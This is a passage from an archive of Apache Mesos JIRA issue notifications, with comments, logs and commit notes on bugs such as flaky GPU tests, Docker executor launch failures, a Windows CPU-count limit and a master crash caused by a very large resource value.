> scheduler-45eafb76-4510-482e-9bcc-06e3ad97c276@172.16.0.7:15101
> W1018 16:55:22.00  6976 master.cpp:5000] Cannot kill task 
> spark.7b59a77b-b353-11e7-addd-b29ecbf071e1 of framework 
> 4d2a982a-0e62-4471-88e8-8df9cc0ae437-0001 (marathon) at 
> scheduler-45eafb76-4510-482e-9bcc-06e3ad97c276@172.16.0.7:15101 because the 
> agent 4d2a982a-0e62-4471-88e8-8df9cc0ae437-S129 at slave(1)@10.0.0.81:5051 
> (10.0.0.81) is disconnected. Kill will be retried if the agent re-registers
> {noformat}
> Clearly, if the agent is offline, the task is also not running. Also, it is 
> not clear that waiting indefinitely for an agent to recover is a good strategy.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8123) GPU tests are failing due to TASK_STARTING.

2017-11-13 Thread Alexander Rukletsov (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8123?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Alexander Rukletsov updated MESOS-8123:
---
Shepherd: Jie Yu
Story Points: 1
  Labels: flaky-test mesosphere  (was: )
 Component/s: test

> GPU tests are failing due to TASK_STARTING.
> ---
>
> Key: MESOS-8123
> URL: https://issues.apache.org/jira/browse/MESOS-8123
> Project: Mesos
>  Issue Type: Bug
>  Components: test
>Reporter: Jie Yu
>Assignee: Alexander Rukletsov
>  Labels: flaky-test, mesosphere
>
> For instance: NvidiaGpuTest.ROOT_CGROUPS_NVIDIA_GPU_VerifyDeviceAccess
> {noformat}
> I1020 22:18:46.180371  1480 exec.cpp:237] Executor registered on agent 
> ca0e7b44-c621-4442-a62e-15f7bf02064b-S0
> I1020 22:18:46.185027  1486 executor.cpp:171] Received SUBSCRIBED event
> I1020 22:18:46.186005  1486 executor.cpp:175] Subscribed executor on core-dev
> I1020 22:18:46.186189  1486 executor.cpp:171] Received LAUNCH event
> I1020 22:18:46.188908  1486 executor.cpp:637] Starting task 
> 3c08cf78-575d-4813-82b6-3ace272db35e
> I1020 22:18:46.192939  1316 slave.cpp:4407] Handling status update 
> TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of fra
> mework ca0e7b44-c621-4442-a62e-15f7bf02064b- from 
> executor(1)@10.0.49.2:42711
> I1020 22:18:46.196228  1330 status_update_manager.cpp:323] Received status 
> update TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace
> 272db35e of framework ca0e7b44-c621-4442-a62e-15f7bf02064b-
> I1020 22:18:46.197510  1329 slave.cpp:4888] Forwarding the update 
> TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of fram
> ework ca0e7b44-c621-4442-a62e-15f7bf02064b- to master@10.0.49.2:34819
> I1020 22:18:46.197927  1329 slave.cpp:4798] Sending acknowledgement for 
> status update TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for 
> task 3c08cf78-575d-4813-82b6-
> 3ace272db35e of framework ca0e7b44-c621-4442-a62e-15f7bf02064b- to 
> executor(1)@10.0.49.2:42711
> I1020 22:18:46.198098  1332 master.cpp:6998] Status update TASK_STARTING 
> (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of framework c
> a0e7b44-c621-4442-a62e-15f7bf02064b- from agent 
> ca0e7b44-c621-4442-a62e-15f7bf02064b-S0 at slave(1)@10.0.49.2:34819 (core-dev)
> I1020 22:18:46.198187  1332 master.cpp:7060] Forwarding status update 
> TASK_STARTING (UUID: 87cee290-b2fe-4459-9b75-b9f03aab6492) for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of 
> framework ca0e7b44-c621-4442-a62e-15f7bf02064b-
> I1020 22:18:46.198463  1332 master.cpp:9162] Updating the state of task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of framework 
> ca0e7b44-c621-4442-a62e-15f7bf02064b- (latest state:
>  TASK_STARTING, status update state: TASK_STARTING)
> I1020 22:18:46.199198  1331 master.cpp:5566] Processing ACKNOWLEDGE call 
> 87cee290-b2fe-4459-9b75-b9f03aab6492 for task 
> 3c08cf78-575d-4813-82b6-3ace272db35e of framework ca0e7b44-
> c621-4442-a62e-15f7bf02064b- (default) at 
> scheduler-f2b66689-382a-4b8c-bdc9-978cff922409@10.0.49.2:34819 on agent 
> ca0e7b44-c621-4442-a62e-15f7bf02064b-S0
> /home/jie/workspace/mesos/src/tests/containerizer/nvidia_gpu_isolator_tests.cpp:142:
>  Failure
>   Expected: TASK_RUNNING
> To be equal to: statusRunning1->state()
>   Which is: TASK_STARTING
> {noformat}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8105) Docker containerizer fails with "Unable to get executor pid after launch"

2017-11-13 Thread Vinod Kone (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8105?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Vinod Kone reassigned MESOS-8105:
-

Assignee: Jie Yu

> Docker containerizer fails with "Unable to get executor pid after launch"
> -
>
> Key: MESOS-8105
> URL: https://issues.apache.org/jira/browse/MESOS-8105
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
>Reporter: maybob
>Assignee: Jie Yu
>  Labels: docker
>
> When running many commands at the same time, each using the same executor 
> with a different executorId via Docker, some executors fail with the error 
> "Unable to get executor pid after launch".
> One reason for this error may be that "docker inspect" hangs or exits 0 with 
> pid 0. Another reason may be that many Docker containers consume a lot of 
> resources, e.g. file descriptors.
> {color:red}Log:{color}
> {code:java}
> I1012 16:15:01.003931 124081 slave.cpp:1619] Got assigned task '920860' for 
> framework framework-id-daily
> I1012 16:15:01.006091 124081 slave.cpp:1900] Authorizing task '920860' for 
> framework framework-id-daily
> I1012 16:15:01.008281 124081 slave.cpp:2087] Launching task '920860' for 
> framework framework-id-daily
> I1012 16:15:01.008779 124081 paths.cpp:573] Trying to chown 
> '/volumes/sdb1/mesos/slaves/89192f68-d28f-498c-808f-442a1ef576b3-S2/frameworks/framework-id-daily/executors/Executor_920860/runs/29c82b61-1242-4de9-80cf-16f46c30e7e3'
>  to user 'maybob'
> I1012 16:15:01.009027 124081 slave.cpp:7401] Checkpointing ExecutorInfo to 
> '/volumes/sdb1/mesos/meta/slaves/89192f68-d28f-498c-808f-442a1ef576b3-S2/frameworks/framework-id-daily/executors/Executor_920860/executor.info'
> I1012 16:15:01.009546 124081 slave.cpp:7038] Launching executor 
> 'Executor_920860' of framework framework-id-daily with resources {} in work 
> directory 
> '/volumes/sdb1/mesos/slaves/89192f68-d28f-498c-808f-442a1ef576b3-S2/frameworks/framework-id-daily/executors/Executor_920860/runs/29c82b61-1242-4de9-80cf-16f46c30e7e3'
> I1012 16:15:01.010339 124081 slave.cpp:7429] Checkpointing TaskInfo to 
> '/volumes/sdb1/mesos/meta/slaves/89192f68-d28f-498c-808f-442a1ef576b3-S2/frameworks/framework-id-daily/executors/Executor_920860/runs/29c82b61-1242-4de9-80cf-16f46c30e7e3/tasks/920860/task.info'
> I1012 16:15:01.010726 124081 slave.cpp:2316] Queued task '920860' for 
> executor 'Executor_920860' of framework framework-id-daily
> I1012 16:15:01.011740 124088 docker.cpp:1175] Starting container 
> '29c82b61-1242-4de9-80cf-16f46c30e7e3' for executor 'Executor_920860' and 
> framework framework-id-daily
> I1012 16:15:01.013123 124081 slave.cpp:877] Successfully attached file 
> '/volumes/sdb1/mesos/slaves/89192f68-d28f-498c-808f-442a1ef576b3-S2/frameworks/framework-id-daily/executors/Executor_920860/runs/29c82b61-1242-4de9-80cf-16f46c30e7e3'
> I1012 16:15:01.013290 124080 fetcher.cpp:353] Starting to fetch URIs for 
> container: 29c82b61-1242-4de9-80cf-16f46c30e7e3, directory: 
> /volumes/sdb1/mesos/slaves/89192f68-d28f-498c-808f-442a1ef576b3-S2/frameworks/framework-id-daily/executors/Executor_920860/runs/29c82b61-1242-4de9-80cf-16f46c30e7e3
> I1012 16:15:01.706429 124071 docker.cpp:909] Running docker -H 
> unix:///var/run/docker.sock run --cpu-shares 378 --memory 427819008 -e 
> LIBPROCESS_PORT=0 -e MESOS_AGENT_ENDPOINT=xxx.xxx.xxx.xxx:5051 -e 
> MESOS_CHECKPOINT=1 -e 
> MESOS_CONTAINER_NAME=mesos-89192f68-d28f-498c-808f-442a1ef576b3-S2.29c82b61-1242-4de9-80cf-16f46c30e7e3
>  -e 
> MESOS_DIRECTORY=/volumes/sdb1/mesos/slaves/89192f68-d28f-498c-808f-442a1ef576b3-S2/frameworks/framework-id-daily/executors/Executor_920860/runs/29c82b61-1242-4de9-80cf-16f46c30e7e3
>  -e MESOS_EXECUTOR_ID=Executor_920860 -e 
> MESOS_EXECUTOR_SHUTDOWN_GRACE_PERIOD=5secs -e 
> MESOS_FRAMEWORK_ID=framework-id-daily -e MESOS_HTTP_COMMAND_EXECUTOR=0 -e 
> MESOS_NATIVE_JAVA_LIBRARY=/usr/local/lib/libmesos-1.3.1.so -e 
> MESOS_NATIVE_LIBRARY=/usr/local/lib/libmesos-1.3.1.so -e 
> MESOS_RECOVERY_TIMEOUT=15mins -e MESOS_SANDBOX=/mnt/mesos/sandbox -e 
> MESOS_SLAVE_ID=89192f68-d28f-498c-808f-442a1ef576b3-S2 -e 
> MESOS_SLAVE_PID=slave(1)@xxx.xxx.xxx.xxx:5051 -e 
> MESOS_SUBSCRIPTION_BACKOFF_MAX=2secs -v 
> /volumes/sdb1/mesos/slaves/89192f68-d28f-498c-808f-442a1ef576b3-S2/frameworks/framework-id-daily/executors/Executor_920860/runs/29c82b61-1242-4de9-80cf-16f46c30e7e3:/mnt/mesos/sandbox
>  --net host --entrypoint /bin/sh --name 
> mesos-89192f68-d28f-498c-808f-442a1ef576b3-S2.29c82b61-1242-4de9-80cf-16f46c30e7e3
>  reg.docker.xxx/xx/executor:v25 -c env && cd $MESOS_SANDBOX && 
> ./executor.sh
> I1012 16:15:01.717859 124071 docker.cpp:1071] Running docker -H 
> unix:///var/run/docker.sock inspect 
> mesos-89192f68-d28f-498c-808f-442a1ef576b3-S2.29c82b61-1242-4de9-80cf-16f46c30e7e3
> I1012 16:15:02.033951 124085

[jira] [Commented] (MESOS-8111) Mesos sees task as running, but cannot kill it because the agent is offline

2017-11-13 Thread Cosmin Lehene (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8111?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250193#comment-16250193
 ] 

Cosmin Lehene commented on MESOS-8111:
--

[~vinodkone] Yes, Marathon.
I could capture the logs next time (the cluster is long gone). 
I think this was happening after scaling down from 100 nodes to 5 or 10. 

I'm trying to understand what prompted the default. Is it to avoid churn when 
the master is in a network partition? 
Perhaps we should adjust the rate limit for these use cases.



> Mesos sees task as running, but cannot kill it because the agent is offline
> ---
>
> Key: MESOS-8111
> URL: https://issues.apache.org/jira/browse/MESOS-8111
> Project: Mesos
>  Issue Type: Bug
>  Components: master
>Affects Versions: 1.2.3
> Environment: DC/OS 1.9.4
>Reporter: Cosmin Lehene
>Assignee: Vinod Kone
>
> After scaling down a cluster, the master is reporting a task as running 
> although the slave has been long gone.
> At the same time it reports it can't kill it because the agent is offline
> {noformat}
> I1018 16:55:22.00  6976 master.cpp:4913] Processing KILL call for task 
> 'spark.7b59a77b-b353-11e7-addd-b29ecbf071e1' of framework 
> 4d2a982a-0e62-4471-88e8-8df9cc0ae437-0001 (marathon) at 
> scheduler-45eafb76-4510-482e-9bcc-06e3ad97c276@172.16.0.7:15101
> W1018 16:55:22.00  6976 master.cpp:5000] Cannot kill task 
> spark.7b59a77b-b353-11e7-addd-b29ecbf071e1 of framework 
> 4d2a982a-0e62-4471-88e8-8df9cc0ae437-0001 (marathon) at 
> scheduler-45eafb76-4510-482e-9bcc-06e3ad97c276@172.16.0.7:15101 because the 
> agent 4d2a982a-0e62-4471-88e8-8df9cc0ae437-S129 at slave(1)@10.0.0.81:5051 
> (10.0.0.81) is disconnected. Kill will be retried if the agent re-registers
> {noformat}
> Clearly, if the agent is offline the task is also not running. Also not sure 
> waiting indefinitely for an agent to recover is a good strategy.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8159) ns::clone uses an async signal unsafe stack

2017-11-13 Thread James Peach (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8159?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

James Peach updated MESOS-8159:
---
Priority: Major  (was: Critical)

> ns::clone uses an async signal unsafe stack
> ---
>
> Key: MESOS-8159
> URL: https://issues.apache.org/jira/browse/MESOS-8159
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
>Reporter: James Peach
>Assignee: James Peach
> Fix For: 1.4.1
>
>
> In {{ns::clone}}, the first child calls {{os::clone}} without passing a 
> parameter for the stack. This causes {{os::clone}} to implicitly {{malloc}} a 
> stack, which is not async-signal-safe.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8159) ns::clone uses an async signal unsafe stack

2017-11-13 Thread James Peach (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8159?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250199#comment-16250199
 ] 

James Peach commented on MESOS-8159:


Downgrading priority; I don't think this is critical.

> ns::clone uses an async signal unsafe stack
> ---
>
> Key: MESOS-8159
> URL: https://issues.apache.org/jira/browse/MESOS-8159
> Project: Mesos
>  Issue Type: Bug
>  Components: containerization
>Reporter: James Peach
>Assignee: James Peach
> Fix For: 1.4.1
>
>
> In {{ns::clone}}, the first child calls {{os::clone}} without passing a 
> parameter for the stack. This causes {{os::clone}} to implicitly {{malloc}} a 
> stack, which is not async-signal-safe.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Created] (MESOS-8216) `os::cpus()` will return incorrect result on machines with > 64 CPUs

2017-11-13 Thread Andrew Schwartzmeyer (JIRA)
Andrew Schwartzmeyer created MESOS-8216:
---

 Summary: `os::cpus()` will return incorrect result on machines 
with > 64 CPUs
 Key: MESOS-8216
 URL: https://issues.apache.org/jira/browse/MESOS-8216
 Project: Mesos
  Issue Type: Bug
  Components: stout
 Environment: Windows
Reporter: Andrew Schwartzmeyer


From Akash:

Just realized this, but I don't think this function works if your machine has 
more than 64 CPUs. It calls GetSystemInfo, which returns the CPU count of the 
"current" processor group, which is capped at 64. Call 
GetMaximumProcessorCount(ALL_PROCESSOR_GROUPS) to get the right number. There 
was a similar bug fix in Python: 
https://github.com/python/cpython/commit/c67bae04780f9d7590f9f91b4ee5f31c5d75b3c3
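
A minimal sketch of the suggested approach (assuming the documented Win32 APIs 
{{GetMaximumProcessorCount}} / {{ALL_PROCESSOR_GROUPS}}; the actual stout 
change may look different):

{code}
#include <windows.h>

#include <iostream>

// Count logical CPUs across *all* processor groups. GetSystemInfo()
// only reports the current group, which is capped at 64 CPUs, while
// GetMaximumProcessorCount(ALL_PROCESSOR_GROUPS) covers every group.
unsigned int cpuCount()
{
  DWORD count = GetMaximumProcessorCount(ALL_PROCESSOR_GROUPS);

  if (count == 0) {
    // Fall back to the single-group value if the call fails.
    SYSTEM_INFO info;
    GetSystemInfo(&info);
    count = info.dwNumberOfProcessors;
  }

  return count;
}

int main()
{
  std::cout << "Logical CPUs: " << cpuCount() << std::endl;
  return 0;
}
{code}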



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8096) Enqueueing events in MockHTTPScheduler can lead to segfaults.

2017-11-13 Thread Alexander Rukletsov (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8096?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250227#comment-16250227
 ] 

Alexander Rukletsov commented on MESOS-8096:


{noformat}
Commit: 75f1274221de5169024008a4187ddb4edd3f9be3 [75f1274]
Author: Alexander Rukletsov ruklet...@gmail.com
Date: 13 November 2017 at 21:52:05 GMT+1
Committer: Alexander Rukletsov al...@apache.org

Refactored scheduler test driver to avoid using uninitialized object.

The shared pointer to MockHTTPScheduler is initialized after the
library, while the library may start using it right after its
initialization via the events callback. This change removes the
shared pointer altogether and hence prevents possible segfaults.

Review: https://reviews.apache.org/r/63611/
{noformat}
{noformat}
Commit: f221d8ebb1846e43d8c319bdcaf2694b1601f55b [f221d8e]
Author: Alexander Rukletsov ruklet...@gmail.com
Date: 13 November 2017 at 21:52:22 GMT+1
Committer: Alexander Rukletsov al...@apache.org

Refactored executor test driver to avoid using uninitialized object.

The shared pointer to MockHTTPExecutor is initialized after the library,
while the library may start using it right after its initialization via
the events callback. This change removes the shared pointer altogether
and hence prevents possible segfaults.

Review: https://reviews.apache.org/r/63613/
{noformat}
{noformat}
Commit: 8194e7cac77571f74c89f824ce3fe2afb5397cc5 [8194e7c]
Author: Alexander Rukletsov ruklet...@gmail.com
Date: 13 November 2017 at 21:52:28 GMT+1
Committer: Alexander Rukletsov al...@apache.org

Removed unnecessary check in v1 scheduler library.

Review: https://reviews.apache.org/r/63614/
{noformat}
{noformat}
Commit: 57eeef05668bf73cbc3c0c38ca28dbf0b90ab8b1 [57eeef0]
Author: Alexander Rukletsov ruklet...@gmail.com
Date: 13 November 2017 at 21:52:35 GMT+1
Committer: Alexander Rukletsov al...@apache.org

Passed scheduler as a shared pointer into the callback.

To ensure the lifetime of the scheduler is longer than the lifetime
of the scheduler library driver, pass scheduler as a shared_ptr.

Review: https://reviews.apache.org/r/63615/
{noformat}
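
Purely illustrative (hypothetical names, not the actual test-driver code), the 
lifetime problem these commits address and the shared_ptr fix look roughly 
like this:

{code}
#include <functional>
#include <iostream>
#include <memory>

// A stand-in for the scheduler whose callbacks may fire at any time
// once the library below has been constructed.
struct Scheduler
{
  void received() { std::cout << "event" << std::endl; }
};

// The library captures a copy of the shared_ptr, so the scheduler
// cannot be destroyed while events may still be delivered to it.
struct Library
{
  explicit Library(const std::shared_ptr<Scheduler>& scheduler)
    : callback([scheduler]() { scheduler->received(); }) {}

  std::function<void()> callback;
};

int main()
{
  auto scheduler = std::make_shared<Scheduler>();
  Library library(scheduler);

  scheduler.reset();   // The library's captured copy keeps it alive.
  library.callback();  // Safe: no dangling pointer, no segfault.

  return 0;
}
{code}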

> Enqueueing events in MockHTTPScheduler can lead to segfaults.
> -
>
> Key: MESOS-8096
> URL: https://issues.apache.org/jira/browse/MESOS-8096
> Project: Mesos
>  Issue Type: Bug
>  Components: scheduler driver, test
> Environment: Fedora 23, Ubuntu 14.04, Ubuntu 16
>Reporter: Alexander Rukletsov
>Assignee: Alexander Rukletsov
>  Labels: flaky-test, mesosphere
> Attachments: AsyncExecutorProcess-badrun-1.txt, 
> AsyncExecutorProcess-badrun-2.txt, AsyncExecutorProcess-badrun-3.txt
>
>
> Various tests segfault due to a yet unknown reason. Comparing logs (attached) 
> hints that the problem might be in the scheduler's event queue.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8200) Suppressed roles are not honoured for v1 scheduler subscribe requests.

2017-11-13 Thread Yan Xu (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8200?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250233#comment-16250233
 ] 

Yan Xu commented on MESOS-8200:
---

[~vinodkone] yes. I have the patch for the devolve code ready, but it seems to 
be exposing some other bugs. I'm addressing them right now and will have it 
ready soon.

> Suppressed roles are not honoured for v1 scheduler subscribe requests.
> --
>
> Key: MESOS-8200
> URL: https://issues.apache.org/jira/browse/MESOS-8200
> Project: Mesos
>  Issue Type: Bug
>  Components: scheduler api, scheduler driver
>Reporter: Alexander Rukletsov
>Assignee: Yan Xu
>Priority: Critical
>
> When triaging MESOS-7996 I've found out that 
> {{Call.subscribe.suppressed_roles}} field is empty when the master processes 
> the request from a v1 HTTP scheduler. More precisely, [this 
> conversion|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/src/master/http.cpp#L969]
>  wipes the field. This is likely because this conversion relies on a general 
> [protobuf conversion 
> utility|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/src/internal/devolve.cpp#L28-L50],
>  which fails to copy {{suppressed_roles}} because they have different tags, 
> compare 
> [v0|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/include/mesos/scheduler/scheduler.proto#L271]
>  and 
> [v1|https://github.com/apache/mesos/blob/1132e1ddafa6a1a9bc8aa966bd01d7b35c7682d9/include/mesos/v1/scheduler/scheduler.proto#L258].



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Assigned] (MESOS-8198) Update the ReconcileOfferOperations protos

2017-11-13 Thread Greg Mann (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8198?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Greg Mann reassigned MESOS-8198:


Assignee: Greg Mann

> Update the ReconcileOfferOperations protos
> --
>
> Key: MESOS-8198
> URL: https://issues.apache.org/jira/browse/MESOS-8198
> Project: Mesos
>  Issue Type: Task
>Reporter: Gastón Kleiman
>Assignee: Greg Mann
>  Labels: mesosphere
>
> Some protos have been committed, but they follow an event-based API.
> We decided to follow the request/response model for this API, so we need to 
> update the protos.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Updated] (MESOS-8198) Update the ReconcileOfferOperations protos

2017-11-13 Thread Greg Mann (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8198?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Greg Mann updated MESOS-8198:
-
Shepherd: Vinod Kone

> Update the ReconcileOfferOperations protos
> --
>
> Key: MESOS-8198
> URL: https://issues.apache.org/jira/browse/MESOS-8198
> Project: Mesos
>  Issue Type: Task
>Reporter: Gastón Kleiman
>Assignee: Greg Mann
>  Labels: mesosphere
>
> Some protos have been committed, but they follow an event-based API.
> We decided to follow the request/response model for this API, so we need to 
> update the protos.



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8129) Very large resource value crashes master

2017-11-13 Thread Benjamin Mahler (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8129?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250290#comment-16250290
 ] 

Benjamin Mahler commented on MESOS-8129:


Thanks Bruce for the well written ticket. I think I could compute this 
empirically based on adding 0.001 until I see the resultant skip a .001. 
Determining it more formally would take me some time given the fractional 
component complicates matters over integers in doubles (I.e. just use 
Number.MAX_SAFE_INTEGER).

Also, I'm curious what your use case is, can you tell me?

> Very large resource value crashes master
> 
>
> Key: MESOS-8129
> URL: https://issues.apache.org/jira/browse/MESOS-8129
> Project: Mesos
>  Issue Type: Bug
>  Components: agent, master
>Affects Versions: 1.4.0
> Environment: Ubuntu 14.04
> Both apt packages from Mesosphere repo and Docker images
>Reporter: Bruce Merry
>Assignee: Benjamin Mahler
>Priority: Minor
>
> I ran into a master that kept failing on this CHECK when destroying a task:
> https://github.com/apache/mesos/blob/1.4.0/src/master/allocator/sorter/drf/sorter.hpp#L367
> I found that a combination of a misconfiguration and a suboptimal choice of 
> units had led to an agent with a custom scalar resource of capacity 
> 429496729500. I believe what is happening is that the pseudo-fixed-point 
> arithmetic isn't able to cope with such large numbers, because rounding 
> errors after arithmetic are bigger than 0.001. Examining the values in the 
> debugger showed that the CHECK failed due to a rounding error on the order 
> of 0.2.
> While this is probably a fundamental limitation of the fixed-point 
> implementation and such large resource values are probably a bad idea, it 
> would have helped if the agent had complained on startup, rather than having 
> to debug an internal assertion failure. I'd suggest that values larger than, 
> say, 10^12 should be rejected when the agent starts (which is why I've added 
> the agent component), although someone familiar with the details of the 
> fixed-point implementation should probably verify that number.
> I'm not sure where this needs to be fixed e.g. if it can just be validated on 
> agent startup or if it should be baked into the Resource class to prevent 
> accidents in requests from the user.
> To reproduce the issue, start a master and an agent with a custom scalar 
> resource "thing:429496729500", then use mesos-execute to throw the 
> following task at it (it'll probably also work with a smaller Docker image - 
> that's just one I already had on the agent). When the sleep ends, the master 
> crashes.
> {code:javascript}
> {
>   "container": {
> "docker": {
>   "image": "ubuntu:xenial-20161010"
> }, 
> "type": "DOCKER"
>   }, 
>   "name": "test-task", 
>   "task_id": {
> "value": "0001"
>   }, 
>   "command": {
> "shell": false, 
> "value": "sleep", 
> "arguments": [
>   "10"
> ]
>   }, 
>   "agent_id": {
> "value": ""
>   }, 
>   "resources": [
> {
>   "scalar": {
> "value": 1
>   }, 
>   "type": "SCALAR", 
>   "name": "cpus"
> }, 
> {
>   "scalar": {
> "value": 4106.0
>   }, 
>   "type": "SCALAR", 
>   "name": "mem"
> }, 
> {
>   "scalar": {
> "value": 12465430.06012024
>   }, 
>   "type": "SCALAR", 
>   "name": "thing"
> }
>   ]
> }
> {code}



--
This message was sent by Atlassian JIRA
(v6.4.14#64029)


[jira] [Commented] (MESOS-8171) Using a failoverTimeout of 0 with Mesos native scheduler client can result in infinite subscribe loop

2017-11-13 Thread Meng Zhu (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8171?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16250294#comment-16250294
 ] 

Meng Zhu commented on MESOS-8171:
-

Thanks Tim, we will take your fix.

Here we are correlating the framework failover time with the subscribe backoff 
time. The goal is to ensure that a framework can retry at least once before it 
is dropped. This is a configuration issue. Instead of adding enforcement code 
here for the user, I think a sounder design would be to verify this at 
configuration time and raise a warning if the user has a backoff max larger 
than the failover time.

However, let's settle for the simple fix for now.
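
A rough sketch of that configuration-time check (hypothetical helper and 
durations in seconds, not the actual sched.cpp code):

{code}
#include <iostream>

// Warn when the subscribe/registration backoff can exceed the framework
// failover timeout, since the scheduler may be removed before it gets a
// chance to retry. A failover timeout of 0 (as in this ticket) warns
// against any non-zero backoff.
void validateTimeouts(double failoverTimeoutSecs, double backoffMaxSecs)
{
  if (backoffMaxSecs > failoverTimeoutSecs) {
    std::cerr << "Warning: registration backoff max (" << backoffMaxSecs
              << "s) exceeds the framework failover timeout ("
              << failoverTimeoutSecs << "s)" << std::endl;
  }
}

int main()
{
  validateTimeouts(0.0, 2.0);    // Warns: the misconfiguration above.
  validateTimeouts(600.0, 2.0);  // Fine.
  return 0;
}
{code}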

> Using a failoverTimeout of 0 with Mesos native scheduler client can result in 
> infinite subscribe loop
> -
>
> Key: MESOS-8171
> URL: https://issues.apache.org/jira/browse/MESOS-8171
> Project: Mesos
>  Issue Type: Bug
>  Components: c++ api, java api, scheduler driver
>Affects Versions: 1.1.3, 1.2.2, 1.3.1, 1.4.0
>Reporter: Tim Harper
>Assignee: Meng Zhu
>Priority: Minor
>  Labels: mesosphere
>
> Over the past year, the Marathon team has been plagued with an issue that 
> hits our CI builds periodically in which the scheduler driver enters a tight 
> loop, sending 10,000s of SUBSCRIBE calls to the master per second. I turned 
> on debug logging for the client and the server, and it pointed to an issue 
> with the {{doReliableRegistration}} method in sched.cpp. Here's the logs:
> {code}
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.099815 13397 process.cpp:1383] libprocess is initialized on 
> 127.0.1.1:60957 with 8 worker threads
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.118237 13397 logging.cpp:199] Logging to STDERR
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.128921 13416 sched.cpp:232] Version: 1.4.0
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.151785 13791 group.cpp:341] Group process 
> (zookeeper-group(1)@127.0.1.1:60957) connected to ZooKeeper
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.151823 13791 group.cpp:831] Syncing group operations: queue size 
> (joins, cancels, datas) = (0, 0, 0)
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.151837 13791 group.cpp:419] Trying to create path '/mesos' in 
> ZooKeeper
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.152586 13791 group.cpp:758] Found non-sequence node 'log_replicas' 
> at '/mesos' in ZooKeeper
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.152662 13791 detector.cpp:152] Detected a new leader: (id='0')
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.152762 13791 group.cpp:700] Trying to get 
> '/mesos/json.info_00' in ZooKeeper
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.157148 13791 zookeeper.cpp:262] A new leading master 
> (UPID=master@172.16.10.95:32856) is detected
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.157347 13787 sched.cpp:336] New master detected at 
> master@172.16.10.95:32856
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.157557 13787 sched.cpp:352] No credentials provided. Attempting to 
> register without authentication
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
> 05:39:39.157565 13787 sched.cpp:836] Sending SUBSCRIBE call to 
> master@172.16.10.95:32856
> WARN [05:39:39 EventsIntegrationTest-LocalMarathon-32858] I1104 
